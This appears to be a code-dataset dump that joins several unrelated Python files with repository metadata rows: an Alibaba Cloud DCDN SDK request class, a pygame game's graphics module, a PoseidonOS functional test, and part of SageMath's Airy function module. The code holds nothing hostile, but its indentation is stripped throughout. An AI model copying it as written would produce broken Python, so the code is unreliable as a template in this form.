class DescribeDcdnDomainRealTimeSrcBpsDataRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'dcdn', '2018-01-15', 'DescribeDcdnDomainRealTimeSrcBpsData')
def get_StartTime(self):
return self.get_query_params().get('StartTime')
def set_StartTime(self,StartTime):
self.add_query_param('StartTime',StartTime)
def get_DomainName(self):
return self.get_query_params().get('DomainName')
def set_DomainName(self,DomainName):
self.add_query_param('DomainName',DomainName)
def get_EndTime(self):
return self.get_query_params().get('EndTime')
def set_EndTime(self,EndTime):
self.add_query_param('EndTime',EndTime)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | 34.520833 | 90 | 0.765238 |
1dca48c3faa8e9790295a4d7ca41de98cd149df0 | 17,118 | py | Python | Kessler-Syndrome/graphics.py | Starbuck5/Kessler-Syndrome | 9a85291cc9bd42bfa0a1e949bfb91a973c8e9d43 | [
"Apache-2.0"
] | 5 | 2019-03-01T04:03:31.000Z | 2019-07-28T21:04:20.000Z | Kessler-Syndrome/graphics.py | Starbuck5/Kessler-Syndrome | 9a85291cc9bd42bfa0a1e949bfb91a973c8e9d43 | [
"Apache-2.0"
] | 19 | 2019-03-26T03:59:55.000Z | 2019-06-26T17:01:16.000Z | Kessler-Syndrome/graphics.py | Starbuck5/Kessler-Syndrome | 9a85291cc9bd42bfa0a1e949bfb91a973c8e9d43 | [
"Apache-2.0"
] | 9 | 2019-02-26T03:13:35.000Z | 2019-10-10T02:44:46.000Z | from pgx import pointsToRect
from game import Rotate
from pgx import rotatePixelArt
from pgx import scaleImage
from pgx import Texthelper
from pgx import loadImage
from pgx import spriteSheetBreaker
import pygame
import pgx
from pygame import gfxdraw
#accepts a surface that supports palettes (gifs) and changes the color palette based on preference
#current and new colors are tuples of rgba (r, g, b, a)
def change_color(image, currentColor, newColor, toReturn = False):
palette = image.get_palette()
palette = list(palette)
index = -1
for i in range(255):
if palette[i] == currentColor:
index = i
break
if index == -1:
raise Exception("no such currentColor found in image")
palette[index] = newColor
if toReturn:
newImage = image.copy()
newImage.set_palette(palette)
return newImage
image.set_palette(palette)
class Images:
storage = {}
bounding_rects = {}
def add(name, image, **kwargs): #or (ID, dictionary of rotations)
image = Images._processImage(image, **kwargs)
Images.storage[name] = image
Images.bounding_rects[name] = image.get_bounding_rect()
def addRotate(ID, image, **kwargs): #takes an ID and a surface and adds the dictionary of its rotations to Images storage
image = Images._processImage(image, **kwargs)
rotatedict = {}
rectdict = {}
for j in range(36):
rotatedImage = rotatePixelArt(image, j*10)
rotatedict[j*10] = rotatedImage
rectdict[j*10] = rotatedImage.get_bounding_rect()
Images.storage[ID] = rotatedict
Images.bounding_rects[ID] = rectdict
def _processImage(image, **kwargs):
if "colorkey" in kwargs:
image.set_colorkey(kwargs["colorkey"])
return image
def get(name, *args): #arg = rotation value
if not args:
return Images.storage[name]
var = args[0]
var /= 10
var = round(var)
var *= 10
var = int(var)
var %= 360
return Images.storage[name][var]
def getRect(name, *args):
if not args:
return Images.bounding_rects[name]
var = args[0]
var /= 10
var = round(var)
var *= 10
var = int(var)
var %= 360
return Images.bounding_rects[name][var]
#method used to get hitbox by looking at the image stored in Images class
#when calling use later parameters, default parameters must be explicitly set
#beFancy - True = use bounding rects of data ------ False = use image size alone
def getHitbox(xpos, ypos, name, rotation, centered=True, beFancy=True, realRotation=False):
if isinstance(rotation, str):
image = Images.get(name)
elif realRotation:
image = rotatePixelArt(Images.get(name), rotation)
else:
image = Images.get(name, rotation)
if beFancy:
if isinstance(rotation, str):
bound = Images.getRect(name)
elif realRotation:
image = rotatePixelArt(Images.get(name), rotation)
bound = image.get_bounding_rect()
else:
bound = Images.getRect(name, rotation)
else:
bound = image.get_rect()
if centered:
return bound.move(xpos-0.5*image.get_width(), ypos-0.5*image.get_height())
return bound.move(xpos, ypos)
#inflates a centered hitbox outwards using a scalar
def scaleHitbox(hitBox, scale):
hitBox[0] -= hitBox[2]*0.5*scale
hitBox[1] -= hitBox[3]*0.5*scale
hitBox[2] *= scale
hitBox[3] *= scale
#helps with caching of rotated asteroid images
def rotationCachingHelper(filepath, spritesheetWidth, spritesheetHeight, spritesheetRows, spritesheetColumns, idIntercept, scalar2):
asteroids = loadImage(filepath)
asteroids.set_colorkey((255,255,255))
asteroids = spriteSheetBreaker(asteroids, spritesheetWidth, spritesheetHeight, 0, 0, spritesheetRows, spritesheetColumns)
for i in range(len(asteroids)):
asteroids[i] = scaleImage(asteroids[i], scalar2)
for i in range(len(asteroids)):
Images.addRotate(idIntercept + i, asteroids[i])
#must be called after scaling is fully set up, not before
#starts image caching of rotated images
def init(d_asteroids, d_parts, d_sats, graphlist, scalar2, scalar3, scalarscalar):
#adding all asteroid images/rotations
rotationCachingHelper("images/smallasteroids.gif", 40, 40, 1, 4, 70, scalar2)
rotationCachingHelper("images/mediumasteroids.gif", 50, 50, 1, 4, 80, scalar2)
rotationCachingHelper("images/largeasteroids.gif", 80, 80, 2, 4, 90, scalar2)
#adding all satellites and parts images/rotations
pixelStuff = d_parts + d_sats
for i in range(len(pixelStuff)):
surf = graphlist[pixelStuff[i] - 10]
Images.addRotate(pixelStuff[i], surf)
#adding images for info bars
Images.add("fuelpic", scaleImage(loadImage("images/fuelcanister.tif"), 2*scalarscalar))
Images.add("armorpic", scaleImage(loadImage("images/armor.tif"), scalarscalar))
Images.add("shotpic", scaleImage(loadImage("images/missile.png"), scalarscalar), colorkey=(255,255,255))
#adding other icons
Images.add("infinity", scaleImage(loadImage("images/infinity.tif"), scalarscalar))
Images.add("pygamebadge", scaleImage(loadImage("images/pygame-badge-SMA-unscaled.png"), 2.5*scalarscalar))
#adding miscellaneous other object images
Images.add(0, scaleImage(loadImage("images/zvezda.png"), 2*scalarscalar))
Images.addRotate(7, scaleImage(loadImage("images/alienMines.tif"), 2*scalarscalar))
Images.add(9, scaleImage(loadImage("images/ionblast.png"), .5*scalarscalar))
#aliens
Images.addRotate(120, scaleImage(loadImage("images/aliendrone.gif"), 2*scalarscalar), colorkey=(255,255,255))
Images.addRotate(121, scaleImage(loadImage("images/spiker.gif"), 2*scalarscalar), colorkey=(255,255,255))
Images.addRotate(122, scaleImage(loadImage("images/alienshot.gif"), scalarscalar), colorkey=(255,255,255))
#aliens - alien mines
imageList = spriteSheetBreaker(loadImage("images/alienbomb.gif"), 19, 19, 0, 0, 1, 6)
for i in range(len(imageList)):
image = imageList[i]
image.set_colorkey((255,255,255))
image = scaleImage(image, 2*scalarscalar)
if i == 0:
Images.addRotate(123, image) #reference image at 123 for hitboxes
Images.addRotate(123 + (i+1)/100, image)
#adding different types of stars
base_star = loadImage("images/star.gif")
base_star_unscaled = base_star
base_star.set_colorkey((255,255,255))
base_star = scaleImage(base_star, scalarscalar)
Images.add(100, base_star)
Images.add(101, change_color(base_star, (255,216,0,255), (255, 160, 0, 255), True))
Images.add(102, change_color(base_star, (255,216,0,255), (255, 130, 0, 255), True))
base_star = scaleImage(base_star_unscaled, 2*scalarscalar)
Images.add(103, base_star)
Images.add(104, change_color(base_star, (255,216,0,255), (255, 160, 0, 255), True))
Images.add(105, change_color(base_star, (255,216,0,255), (255, 130, 0, 255), True))
#adding ship, no rotation because it rotates in real time
#loads up spritesheet and loads them all up under separate IDs
imageList = spriteSheetBreaker(loadImage("images/ships.png"), 24, 60, 0, 0, 1, 5)
for i in range(len(imageList)):
imageList[i].set_colorkey((255,255,255))
imageList[i] = scaleImage(imageList[i], scalar3)
Images.add(1.1, imageList[0])
Images.add(1.2, imageList[1])
Images.add(1.3, imageList[2])
Images.add(1.4, imageList[3])
Images.add(1.5, imageList[4])
#adding downed fighters
imageList = spriteSheetBreaker(loadImage("images/fighters.gif"), 42, 22, 0, 0, 2, 2)
for i in range(len(imageList)):
imageList[i].set_colorkey((255,255,255))
imageList[i] = scaleImage(imageList[i], 1.1*scalarscalar)
Images.addRotate(130+i, imageList[i])
#adding derelict ship, no rotation because it's always in the same orientation
image = scaleImage(loadImage("images/derelict.gif"), scalarscalar)
image.set_colorkey((255,255,255))
change_color(image, (0,0,0,255), (25,25,25,255))
Images.add(110, image)
#adding president's ship
Images.addRotate(666, scaleImage(loadImage("images/president.png"), scalarscalar), colorkey=(255,255,255))
#reorders the list so it will print in the correct order
background = [100, 101, 102, 103, 104, 105, 106, 107, 108, 109]
ship = [1,5]
def reorderObjectList(object_list):
newObject_list = []
for i in range(3):
for j in range(0, len(object_list), 8):
object_number = object_list[j+4]
if object_number in background and i == 0:
newObject_list += object_list[j:j+8]
elif object_number in ship and i == 1:
newObject_list += object_list[j:j+8]
elif object_number not in ship and object_number not in background and i == 2:
newObject_list += object_list[j:j+8]
return newObject_list
SHIPSTATE = 1 #set in main, controls which of the durability stages of the ship prints (not always 1)
#the nuts and bolts of printing the things
def crayprinter(screen, xpos, ypos, object_number, rotation, decayLife, scalar3, graphlist, scalarscalar, flame, special):
colliderect = ""
if object_number == 0: #draws zvezda
image = Images.get(0)
screen.blit(image, (xpos, ypos))
elif object_number == 1 or object_number == 5: #draws main ship
image = rotatePixelArt(Images.get(1+SHIPSTATE/10), -rotation.getRotation())
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = [int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height()), image.get_width(),
image.get_height()]
if flame == True:
#flame_pointlist = [[50 + 6, 50 + 5], [50, 50 + 20], [50 - 6, 50 + 5]]
flame_pointlist = [[xpos, ypos], [xpos+6*scalar3, ypos+5*scalar3],
[xpos, ypos+20*scalar3],
[xpos-6*scalar3, ypos+5*scalar3]]
flame_pointlist = Rotate(xpos, ypos, flame_pointlist, rotation.getRotation())
flame_color = (255,100,0) if pgx.filehelper.get(3)[4] < 1 else (138, 43, 226)
pygame.gfxdraw.aapolygon(screen, flame_pointlist, flame_color)
pygame.gfxdraw.filled_polygon(screen, flame_pointlist, flame_color)
flame = False
elif object_number == 2 or object_number == 8: #draws missiles (id 8 are alien missiles)
pygame.draw.circle(screen, (255, 255, 255), (int(xpos), int(ypos)), 2, 0)
elif object_number == 4: #draws explosion effects
pygame.draw.circle(screen, (255, 255, 255), (int(xpos), int(ypos)), 1, 0)
elif object_number == 9: #draws alien blasts
scale = 1 + (.1 * (300 - decayLife))
image = scaleImage(Images.get(9), scale)
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = Images.getHitbox(xpos, ypos, 9, rotation.getRotation())
Images.scaleHitbox(colliderect, scale)
elif object_number == 123:
image = Images.get(special.getFrameNum(), rotation.getRotation())
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = Images.getHitbox(xpos, ypos, 123, rotation.getRotation())
else:
try:
if rotation.getRotating():
image = Images.get(object_number, rotation.getRotation())
else:
image = Images.get(object_number)
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = Images.getHitbox(xpos, ypos, object_number, rotation.getRotation())
except:
pass
return colliderect
#takes care of the printing logic
def printer(screen, object_list, scalar3, graphlist, scalarscalar, flame):
object_list = reorderObjectList(object_list)
#needed for testing which direction things are off the screen
width, height = screen.get_size()
left = pygame.Rect(-1,0,1,height)
right = pygame.Rect(width,0,1,height)
up = pygame.Rect(0,-1,width,1)
down = pygame.Rect(0,height,width,1)
for i in range(0, len(object_list), 8):
xpos = object_list[i]
ypos = object_list[i+1]
object_number = object_list[i+4] #object type
rotation = object_list[i+5] #rotation position
special = object_list[i+6]
decayLife = object_list[i+7]
colliderect = crayprinter(screen, xpos, ypos, object_number, rotation, decayLife, scalar3, graphlist, scalarscalar,
flame, special)
if colliderect:
if not screen.get_rect().contains(colliderect):
if left.colliderect(colliderect):
xpos += width
elif right.colliderect(colliderect):
xpos -= width
if up.colliderect(colliderect):
ypos += height
elif down.colliderect(colliderect):
ypos -= height
crayprinter(screen, xpos, ypos, object_number, rotation, decayLife, scalar3, graphlist, scalarscalar,
flame, special)
#flashing alerts for low fuel and armor
class FlashyBox:
def __init__(self, rect, threshold, color):
self.rect = rect
self.threshold = threshold
self.color = color
self.timer = -1
self.displaying = False
def update(self, screen, current):
if current < self.threshold:
self.timer += 1
elif current > self.threshold:
self.timer = -1
self.displaying = False
if self.timer != -1: #flips displaying when timer reaches 50
if self.timer == 50:
self.displaying = not self.displaying
self.timer = 0
if self.displaying: #draws the rectangle
pgx.draw.rect(screen, self.color, self.rect, 0)
#controls the fuel, armor, and ammunition readout in bottom right
class InfoBars:
fuelalert = 1
armoralert = 1
def init(fuelalert, armoralert):
InfoBars.fuelalert = fuelalert
InfoBars.armoralert = armoralert
#prints out the fuel and armor bars
def draw(screen, currentfuel, totalfuel, currentarmor, totalarmor, ammunition, totalammunition):
fuelpic = Images.get("fuelpic")
armorpic = Images.get("armorpic")
shotpic = Images.get("shotpic")
#fuel
InfoBars.fuelalert.update(screen, currentfuel/totalfuel)
pgx.draw.sblit(screen, fuelpic, ("right-270", 1000))
pgx.draw.rect(screen, (178,34,34), ["right-220", 1000, 200, 50])
pgx.draw.rect(screen, (139,0,0), ["right-220", 1000, 200*currentfuel/totalfuel, 50])
#Texthelper.write(screen, [(1665, 1005), str(currentfuel), 3])
#armor
InfoBars.armoralert.update(screen, currentarmor/totalarmor)
pgx.draw.sblit(screen, armorpic, ("right-270", 930))
pgx.draw.rect(screen, (128,128,128), ["right-220", 930, 200, 50])
pgx.draw.rect(screen, (64,64,64), ["right-220", 930, 200*currentarmor/totalarmor, 50])
#Texthelper.write(screen, [(1665, 935), str(currentarmor), 3])
#ammunition
pgx.draw.sblit(screen, shotpic, ("right-270", 860))
Texthelper.write(screen, [("right-205", 865), str(ammunition) + "/" + str(totalammunition), 3])
#used by the map to actually draw out the sectors
def drawSector(screen, location, number, currentsector, cleared):
secsize = 80 #side length of the cubes
if number == currentsector:
color = (70, 130, 180)
elif cleared:
color = (20, 160, 40)
else:
color = (180, 50, 50)
pgx.draw.rect(screen, color, (location[0]-secsize/2, location[1]-secsize/2, secsize, secsize), 4)
if number == currentsector:
Texthelper.write(screen, [(location[0]-35, location[1]-35), "U R Here", 1], color=color)
Texthelper.write(screen, [(location[0]-len(str(number))*10, location[1]-15), str(number), 2], color=color)
#used in UIscreens and the main game loop to display the inventory
def drawInventory(screen, shipInventory):
Texthelper.write(screen, [("left+10",10), f"metal:{shipInventory[0]}", 3], color = (120,120,120))
Texthelper.write(screen, [("left+315",10), f"gas:{shipInventory[1]}", 3], color = (185,20,20))
Texthelper.write(screen, [("left+560",10), f"circuits:{shipInventory[2]}", 3], color = (20,185,20))
Texthelper.write(screen, [("left+965",10), f"credits:{shipInventory[3]}", 3], color = (230,180,20))
| 44.232558 | 132 | 0.637574 |
608741e2664030ef7eded0de736775fa79908a2c | 588 | py | Python | test/functional_requirements/devel/RESET_EVENT_WRR_POLICY_BASIC.py | so931/poseidonos | 2aa82f26bfbd0d0aee21cd0574779a655634f08c | [
"BSD-3-Clause"
] | 38 | 2021-04-06T03:20:55.000Z | 2022-03-02T09:33:28.000Z | test/functional_requirements/devel/RESET_EVENT_WRR_POLICY_BASIC.py | so931/poseidonos | 2aa82f26bfbd0d0aee21cd0574779a655634f08c | [
"BSD-3-Clause"
] | 19 | 2021-04-08T02:27:44.000Z | 2022-03-23T00:59:04.000Z | test/functional_requirements/devel/RESET_EVENT_WRR_POLICY_BASIC.py | so931/poseidonos | 2aa82f26bfbd0d0aee21cd0574779a655634f08c | [
"BSD-3-Clause"
] | 28 | 2021-04-08T04:39:18.000Z | 2022-03-24T05:56:00.000Z | #!/usr/bin/env python3
import subprocess
import os
import sys
sys.path.append("../")
sys.path.append("../../system/lib/")
sys.path.append("../system_overall/")
import json_parser
import pos
import cli
import api
import json
import START_POS_BASIC
def execute():
START_POS_BASIC.execute()
out = cli.reset_event_wrr_policy()
return out
if __name__ == "__main__":
if len(sys.argv) >= 2:
pos.set_addr(sys.argv[1])
api.clear_result(__file__)
out = execute()
ret = api.set_result_by_code_eq(out, 0, __file__)
pos.flush_and_kill_pos()
exit(ret)
| 18.375 | 53 | 0.688776 |
b4bffde38480b9dbb11547c19b96236422867543 | 30,150 | py | Python | src/sage/functions/airy.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | null | null | null | src/sage/functions/airy.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | null | null | null | src/sage/functions/airy.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | 1 | 2020-07-24T12:20:37.000Z | 2020-07-24T12:20:37.000Z | r"""
Airy Functions
This module implements Airy functions and their generalized derivatives. It
supports symbolic functionality through Maxima and numeric evaluation through
mpmath and scipy.
Airy functions are solutions to the differential equation `f''(x) - x f(x) = 0`.
Four global function symbols are immediately available, please see
- :func:`airy_ai`: for the Airy Ai function
- :func:`airy_ai_prime()<FunctionAiryAiPrime>`: for the first differential
of the Airy Ai function
- :func:`airy_bi`: for the Airy Bi function
- :func:`airy_bi_prime()<FunctionAiryBiPrime>`: for the first differential
of the Airy Bi function
AUTHORS:
- Oscar Gerardo Lazo Arjona (2010): initial version
- Douglas McNeil (2012): rewrite
EXAMPLES:
Verify that the Airy functions are solutions to the differential equation::
sage: diff(airy_ai(x), x, 2) - x * airy_ai(x)
0
sage: diff(airy_bi(x), x, 2) - x * airy_bi(x)
0
"""
#*****************************************************************************
# Copyright (C) 2010 Oscar Gerardo Lazo Arjona <algebraicamente@gmail.com>
# Copyright (C) 2012 Douglas McNeil <dsm054@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.symbolic.function import BuiltinFunction
from sage.symbolic.expression import Expression
from sage.symbolic.ring import SR
from sage.structure.coerce import parent as sage_structure_coerce_parent
from sage.functions.other import gamma
from sage.rings.integer_ring import ZZ
from sage.rings.real_double import RDF
from sage.rings.rational import Rational as R
from sage.functions.special import meval
from sage.calculus.functional import derivative
class FunctionAiryAiGeneral(BuiltinFunction):
def __init__(self):
r"""
The generalized derivative of the Airy Ai function
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Ai}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Ai}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: x, n = var('x n')
sage: airy_ai_general(-2, x)
airy_ai(-2, x)
sage: derivative(airy_ai_general(-2, x), x)
airy_ai(-1, x)
sage: airy_ai_general(n, x)
airy_ai(n, x)
sage: derivative(airy_ai_general(n, x), x)
airy_ai(n + 1, x)
"""
BuiltinFunction.__init__(self, "airy_ai", nargs=2,
latex_name=r"\operatorname{Ai}")
def _derivative_(self, alpha, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: x, n = var('x n')
sage: derivative(airy_ai_general(n, x), x)
airy_ai(n + 1, x)
sage: derivative(airy_ai_general(n, x), n)
Traceback (most recent call last):
...
NotImplementedError: cannot differentiate airy_ai in the first parameter
"""
if diff_param == 0:
raise NotImplementedError("cannot differentiate airy_ai in the"
" first parameter")
return airy_ai_general(alpha + 1, x)
def _eval_(self, alpha, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: x, n = var('x n')
sage: airy_ai_general(-2, 1.0)
0.136645379421096
sage: airy_ai_general(n, 1.0)
airy_ai(n, 1.00000000000000)
"""
if not isinstance(x, Expression) and \
not isinstance(alpha, Expression):
if self._is_numerical(x):
return self._evalf_(alpha, x)
if alpha == 0:
return airy_ai_simple(x)
if alpha == 1:
return airy_ai_prime(x)
if alpha == 2:
return x*airy_ai_simple(x)
else:
return None
def _evalf_(self, alpha, x, parent=None, algorithm=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: airy_ai_general(-2, 1.0)
0.136645379421096
"""
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airyai, x, derivative=alpha,
parent=parent)
class FunctionAiryAiSimple(BuiltinFunction):
def __init__(self):
"""
The class for the Airy Ai function.
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: f = airy_ai_simple(x); f
airy_ai(x)
"""
BuiltinFunction.__init__(self, "airy_ai",
latex_name=r'\operatorname{Ai}',
conversions=dict(mathematica='AiryAi',
maxima='airy_ai'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: derivative(airy_ai_simple(x), x)
airy_ai_prime(x)
"""
return airy_ai_prime(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: airy_ai_simple(0)
1/3*3^(1/3)/gamma(2/3)
sage: airy_ai_simple(0.0)
0.355028053887817
sage: airy_ai_simple(I)
airy_ai(I)
sage: airy_ai_simple(1.0 * I)
0.331493305432141 - 0.317449858968444*I
"""
if x == 0:
r = ZZ(2) / 3
return 1 / (3 ** (r) * gamma(r))
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: airy_ai_simple(0.0)
0.355028053887817
sage: airy_ai_simple(1.0 * I)
0.331493305432141 - 0.317449858968444*I
We can use several methods for numerical evaluation::
sage: airy_ai_simple(3).n(algorithm='mpmath')
0.00659113935746072
sage: airy_ai_simple(3).n(algorithm='mpmath', prec=100)
0.0065911393574607191442574484080
sage: airy_ai_simple(3).n(algorithm='scipy') # rel tol 1e-10
0.006591139357460719
sage: airy_ai_simple(I).n(algorithm='scipy') # rel tol 1e-10
0.33149330543214117 - 0.3174498589684438*I
TESTS::
sage: parent(airy_ai_simple(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_ai_simple(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_ai not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent')
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[0]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[0]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airyai, x, parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
class FunctionAiryAiPrime(BuiltinFunction):
def __init__(self):
"""
The derivative of the Airy Ai function; see :func:`airy_ai`
for the full documentation.
EXAMPLES::
sage: x, n = var('x n')
sage: airy_ai_prime(x)
airy_ai_prime(x)
sage: airy_ai_prime(0)
-1/3*3^(2/3)/gamma(1/3)
"""
BuiltinFunction.__init__(self, "airy_ai_prime",
latex_name=r"\operatorname{Ai}'",
conversions=dict(mathematica='AiryAiPrime',
maxima='airy_dai'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: derivative(airy_ai_prime(x), x)
x*airy_ai(x)
"""
return x * airy_ai_simple(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: airy_ai_prime(0)
-1/3*3^(2/3)/gamma(1/3)
sage: airy_ai_prime(0.0)
-0.258819403792807
"""
if x == 0:
r = ZZ(1) / 3
return -1 / (3 ** (r) * gamma(r))
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: airy_ai_prime(0.0)
-0.258819403792807
We can use several methods for numerical evaluation::
sage: airy_ai_prime(4).n(algorithm='mpmath')
-0.00195864095020418
sage: airy_ai_prime(4).n(algorithm='mpmath', prec=100)
-0.0019586409502041789001381409184
sage: airy_ai_prime(4).n(algorithm='scipy') # rel tol 1e-10
-0.00195864095020418
sage: airy_ai_prime(I).n(algorithm='scipy') # rel tol 1e-10
-0.43249265984180707 + 0.09804785622924324*I
TESTS::
sage: parent(airy_ai_prime(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_ai_prime(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_ai_prime not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent', None)
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[1]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[1]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airyai, x, derivative=1,
parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
airy_ai_general = FunctionAiryAiGeneral()
airy_ai_simple = FunctionAiryAiSimple()
airy_ai_prime = FunctionAiryAiPrime()
def airy_ai(alpha, x=None, hold_derivative=True, **kwds):
r"""
The Airy Ai function
The Airy Ai function `\operatorname{Ai}(x)` is (along with
`\operatorname{Bi}(x)`) one of the two linearly independent standard
solutions to the Airy differential equation `f''(x) - x f(x) = 0`. It is
defined by the initial conditions:
.. math ::
\operatorname{Ai}(0)=\frac{1}{2^{2/3} \Gamma\left(\frac{2}{3}\right)},
\operatorname{Ai}'(0)=-\frac{1}{2^{1/3}\Gamma\left(\frac{1}{3}\right)}.
Another way to define the Airy Ai function is:
.. math::
\operatorname{Ai}(x)=\frac{1}{\pi}\int_0^\infty
\cos\left(\frac{1}{3}t^3+xt\right) dt.
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Ai}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Ai}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
- ``hold_derivative`` -- Whether or not to stop from returning higher
derivatives in terms of `\operatorname{Ai}(x)` and
`\operatorname{Ai}'(x)`
.. SEEALSO:: :func:`airy_bi`
EXAMPLES::
sage: n, x = var('n x')
sage: airy_ai(x)
airy_ai(x)
It can return derivatives or integrals::
sage: airy_ai(2, x)
airy_ai(2, x)
sage: airy_ai(1, x, hold_derivative=False)
airy_ai_prime(x)
sage: airy_ai(2, x, hold_derivative=False)
x*airy_ai(x)
sage: airy_ai(-2, x, hold_derivative=False)
airy_ai(-2, x)
sage: airy_ai(n, x)
airy_ai(n, x)
It can be evaluated symbolically or numerically for real or complex
values::
sage: airy_ai(0)
1/3*3^(1/3)/gamma(2/3)
sage: airy_ai(0.0)
0.355028053887817
sage: airy_ai(I)
airy_ai(I)
sage: airy_ai(1.0*I)
0.331493305432141 - 0.317449858968444*I
The functions can be evaluated numerically either using mpmath. which
can compute the values to arbitrary precision, and scipy::
sage: airy_ai(2).n(prec=100)
0.034924130423274379135322080792
sage: airy_ai(2).n(algorithm='mpmath', prec=100)
0.034924130423274379135322080792
sage: airy_ai(2).n(algorithm='scipy') # rel tol 1e-10
0.03492413042327323
And the derivatives can be evaluated::
sage: airy_ai(1, 0)
-1/3*3^(2/3)/gamma(1/3)
sage: airy_ai(1, 0.0)
-0.258819403792807
Plots::
sage: plot(airy_ai(x), (x, -10, 5)) + plot(airy_ai_prime(x),
....: (x, -10, 5), color='red')
Graphics object consisting of 2 graphics primitives
**References**
- Abramowitz, Milton; Stegun, Irene A., eds. (1965), "Chapter 10"
- :wikipedia:`Airy_function`
"""
# We catch the case with no alpha
if x is None:
x = alpha
return airy_ai_simple(x, **kwds)
# We take care of all other cases.
if not alpha in ZZ and not isinstance(alpha, Expression):
return airy_ai_general(alpha, x, **kwds)
if hold_derivative:
return airy_ai_general(alpha, x, **kwds)
elif alpha == 0:
return airy_ai_simple(x, **kwds)
elif alpha == 1:
return airy_ai_prime(x, **kwds)
elif alpha > 1:
# We use a different variable here because if x is a
# particular value, we would be differentiating a constant
# which would return 0. What we want is the value of
# the derivative at the value and not the derivative of
# a particular value of the function.
v = SR.symbol()
return derivative(airy_ai_simple(v, **kwds), v, alpha).subs({v: x})
else:
return airy_ai_general(alpha, x, **kwds)
########################################################################
########################################################################
class FunctionAiryBiGeneral(BuiltinFunction):
def __init__(self):
r"""
The generalized derivative of the Airy Bi function.
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Bi}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Bi}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: x, n = var('x n')
sage: airy_bi_general(-2, x)
airy_bi(-2, x)
sage: derivative(airy_bi_general(-2, x), x)
airy_bi(-1, x)
sage: airy_bi_general(n, x)
airy_bi(n, x)
sage: derivative(airy_bi_general(n, x), x)
airy_bi(n + 1, x)
"""
